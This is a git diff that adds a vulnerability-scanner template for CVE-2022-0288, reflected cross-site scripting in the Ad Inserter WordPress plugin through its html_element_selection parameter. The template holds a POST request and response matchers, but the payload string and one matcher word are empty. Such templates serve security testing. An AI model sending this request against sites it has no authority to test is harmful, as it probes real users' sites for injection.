diff --git a/cves/2022/CVE-2022-0288.yaml b/cves/2022/CVE-2022-0288.yaml new file mode 100644 index 0000000000..d2c07e83a1 --- /dev/null +++ b/cves/2022/CVE-2022-0288.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-0288 + +info: + name: Ad Inserter < 2.7.10 - Reflected Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. + remediation: Fixed in version 2.7.12 + reference: + - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 + tags: cve,cve2022,wordpress,xss + +requests: + - method: POST + path: + - "{{BaseURL}}" + + headers: + Content-Type: "application/x-www-form-urlencoded" + + body: | + html_element_selection= + + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "" + - "ad-inserter" + condition: and + + - type: word + part: header + words: + - "text/html" \ No newline at end of file